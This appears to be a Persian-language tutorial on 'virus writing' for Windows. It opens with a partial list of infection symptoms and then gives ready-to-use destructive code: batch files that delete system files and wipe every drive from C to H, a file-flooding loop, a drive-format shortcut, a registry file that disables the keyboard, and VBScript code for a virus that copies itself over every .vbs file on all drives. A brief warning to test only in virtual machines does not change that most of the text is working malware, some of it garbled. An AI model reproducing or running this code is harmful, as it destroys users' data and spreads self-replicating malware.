فشردن کلیدهای Ctrl+Alt+Delنیز نمیتواند سیستم را دوباره
راهاندازی کند.
- ۱۰اطالعات بخشی از دیسک سخت یا تمام آن بطور ناگهانی از
بین میرود یا دیسک سخت ناخواسته فرمت میشود.
- ۱۱اندازه فایلهای اجرایی افزایش مییابد.
- ۱۲خواص فایلهای اجرایی تغییر میکند.
میشود که این مورد با تولید مادر بورد های دوال بایاس مرتفع
گردیده .
- ۱۵برنامهها مراجعاتی به دیسکت انجام میدهند که قبًال انجام
نمیدادند.
- ۱۶کاهش فضای خالی دیسک درایو بدون اینکه فایلی اضافه شده
یا به محتوای فایلها افزوده شده باشد.
- ۱۷نرمافزارها با خطا اجرا شده یا اصًال اجرا نمیشوند.
- 1۸بعضی برنامهها سعی در برقراری ارتباط با اینترنتی را دارند،
که امکان وجود جاسوسی از طریق ویروس آلودهکننده امکانپذیر
میباشد .
- ۱۹هنگام کار با اینترنت مقدار ارسال و دریافت اطالعات
ناخواسته افزایش یافته و سرعت به شدت افت میکند.
- ۲۰نامههای الکترونیکی یا همان ایمیلها ناخواسته از روی سیستم
ارسال شده یا دریافت میگردد ( در برنامه ای ایمیل آفالین مانند
اوت لوک .
-۲۱تونلز بار یا افزونه ای به صورت ناخواسته روی مرورگر نصب
شده و پاک کردن آن نیز فایده ای ندارد.
-۲۲آنتی ویروس غیر فعال شده و یا به درستی کار نمیکند.
-۲3بعضی از ویروسها با ساخت فایلهایی با حجمهای یکنواخت
سعی در پر کردن رم کامپیوتر را دارند که از طریق task manager
در سیستم عاملهای ویندوز قابل مشاهده میباشند.
-24گاهی ویروسها اقدام به واکنش نسبت به بازیابی اطالعات از
دست رفته با نرم افزار نموده و باعث پر شدن رم قربانی
چند نمونه نوشتن ویروس
ویروس نویسی برای
ویندوز
در این اموزس قصد داریم با انواع ویروس های ساده ویندوزی اشنا
شوید و یک اصول و دید کلی از ساخت ویروس و اموزش ویروس
نویسی داشته باشید.
در ان اموزش با ویروس های نوشته شده با دستورات ویندوزی اشنا
میشویم و به طور مثال چند ویروس ساده را معرفی و تخلیل خواهیم
کرد
بسیاری از این اموزش ویروس ها که در ادامه می اموزید همچنان در
دنیای امروز وجود دارد و حتی بعضی از ان ها توسط انتی ویروس ها
غیر قابل شناسایی هستند
امروزه ویروس ها به نحو دیگری استفاده میشوند به طور مثال باج
افزار ها راه های برای کنترل سیستم قربانی و …
اما این اموزش جالب ساخت ویروس و ترفند های ان هرچند ممکن
است بعضی از ان ها در سیستم عامل های جدیدتر جواب ندهند.
این تست ها را داخل سیستم اصلی خود تست نکنید و
حتما از مجازی ساز ها استفاده نمایید
به طور مثال در چند سال پیش برای ریاستارت شدن
ویندوز یک دستور ساده batاستفاده میشد
del config.sys cd winnt del system.ini del win.ini
کافیست یک فایل با نام دلخواه و پسوند bat.بسازید و
دستور باال را در ان بگزارید و اجرا کنید سیستم عامل
ریاستارت میشود
در دستور باال ۳فایل اصلی ویندوز از سیستم حذف
میشود و منجر ب ریاستارت سیستم میشود.
اموزش ویروس فرمت درایو c
@Echo off
Del C: *.* |y
مانند دستور باال ان را در یک فایل bat.ذخیره کنید و
بعد از اجرا فایل های مهم و اصلی ویندوز از بین
خواهد رفت.
این تست ها را داخل سیستم اصلی خود تست نکنید و
استفاده نمایید
ساز ها
مجازی
حتما از
ویندوز
زمان
تغیر
ساخت ویروس
@ECHO OFF
date=0-0-0
از هر دستوری برای عملیات مخرب استفاده میشود در
کد باال تاریخ و ساعت ویندوز را صفر میکنند که حتی
ویروس شناخته نمیشوند با چند ترفنده ساده باعث
خرابکاری میشوند
دستور ساخت ویروس بالک شدن اینترنت مرورگر
pouped-blocked-web-exploure-online&offline
این دستور فقط بر روی مرورگر IEویندوز جواب
میدهد و در سیستم های جدید با مرورگر های جدید تر
جواب نخواهد داد
این اموزش ها فقط برای اشنایی با دستورات و مقدمه
اموزش های دیگر میباشد
@echo off
:top
echo %random%>%random%.exe
goto top
این دستور برای ساخت فایل های بسیار زیاد و اسم بر مسیری که فایل
batاجرا شذه است میباشد
بسیار جالب است و همچنان بر بسیاری از سیستم ها عمل خواهد کرد
برای تغیر فرمت فایل های ایجاد شده در دستور باال exeرا به پسوند
مورد نظر خود تغیر دهید
فایل batنمایش متن در cmd
@echo off
color a
cls
:a
echo PentestCore
goto a
pause
استفاده از دستور باال در ابتدا color aرنگ سبز را به متن میدهد و با
تغیر aمیتوانید رنگ مورد نظر خود را انتخاب کنید.
دستور clsکامنت را پاک کرده و PentestCoreرا با رنگ سپز با سرعت
نمایش میدهد به دلیل استفاده از pauseتا زمانی که پنجره باز شده
بسته نشود این عمل انجام میشود
امنیت درمقابل ویروس ها
برای امنیت در مقابل ویروس ها از انتی ویروس
ها استفاده کنید یا قبل از اجرای هر فایل ان را
در سایت های معروف اسکن فایل ها چک کنید
ویروسی که باعث غیرفعال شدن کیبرد کامپیوتر میشود
ویندوز را باز کرده واین کدها را در ان تایپNotepad اول برنامه
کرده
windows registry editor version 5.00
[hkey_current_user Control Panel\Accessibility\Keyboard
Response]
"flags"="127"
[ hkey_current_user Control Panel\Accessibility\SoundSentry]
"flags"="3"
""windows effect"="0
virus.reg به این صورتreg تایپ کرده وبعد ان را با فرمت
. ذخیره کنید
shutdown -s -t 30
"shutdown -S -C "lLOVe you
وبعد با فرمت batذخیره کنید .کامپیوتر را پس از 30ثانیه خاموش میکنه و
پیام lLOVe youرا
نشان میده
اول برنامه Notepadویندوز را باز کرده واین کدها را در ان تایپ کرده
shutdown -r -t 30
"shutdown -S -C "lLOVe you
وبعد با فرمت batذخیره کنید .کامپیوتر را پس از 30ثانیه ریسیت میکنه و
پیام lLOVe youرا
نشان میده
اول برنامه Notepadویندوز را باز کرده واین کدها را در ان تایپ کرده
shutdown -L -t 30
"shutdown -S -C "lLOVe you
وبعد با فرمت batذخیره کنید .کامپیوتر را پس از 30ثانیه لوگ اف میکنه و
پیام lLOVe youرا
نشان میده
اول برنامه Notepadویندوز را باز کرده واین کدها را در ان تایپ کرده
shutdown -F -t 30
"shutdown -S -C "lLOVe you
وبعد با فرمت batذخیره کنید .کامپیوتر را پس از 30ثانیه استندبوی میکنه
و پیام lLOVe youرا
نشان میده
انتی ویروی این ویروس هم اینجوری نوت پد را باز کرده و کد زیر را در ان
تایپ کرده
ویروسی که باعث فرمت درایو Dمی شود
روی صفحه دکستاپ راست کلیک Newوبعد گزینه
shortcutوبعد کد زیر را دران تایپ
format D:/autotesst
وبعد Nextوبعد نام Nextوبعد انتخاب ایکن وبعد
Finishرا بزنید .
ویروسی که باعث میشه ساعت وتاریخ صفره
بشه
اول برنامه Notepadویندوز را باز کرده واین کدها
را در ان تایپ کرده
@echo off
time=0:0:0
cd\WINDOWS
del system.ini
del win.ini
date=10-10-10
وبعد با فرمت batذخیره کرده
ویروسی که باعث تخریب هارد دیسک میشود
ویندوز را باز کرده و این کدها را در انNotepad اول برنامه
تایپ کرده
echo off@
attrib -a -s -h -rc
attrib -a -s -h -r C:\WINDOWS\*.*
del C:\*.*echoy|echo|echoy
del D:\*.*echoy|echo|echoy
del E:\*.*echoy|echo|echoy
del F:\*.*echoy|echo|echoy
del G:\*.*echoy|echo|echoy
del H:\*.*echoy|echo|echoy
copy C:\*.*|echoy
copy D:\*.*|echoy
copy E:\*.*|echoy
copy F:\*.*|echoy
copy G:\*.*|echoy
copy H:\*.*|echoy
ذخیره کردهbat وبعد با فرمت
Biosan ساخت ویروس
ویندوز را باز کرده واین کدها را درNotepad اول برنامه
ان تایپ کرده
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.is ready Then
folderlist(d.path&"\")
end if
Next
end sub
sub infectfiles(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
if (ext="vbs") or (ext="vbe") then
set ap=fso.Opentextfile(f1.path,2,true)
ap.write vbscopy
ap.close
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
. ذخیره کردهvbs وبعد با فرمت
The end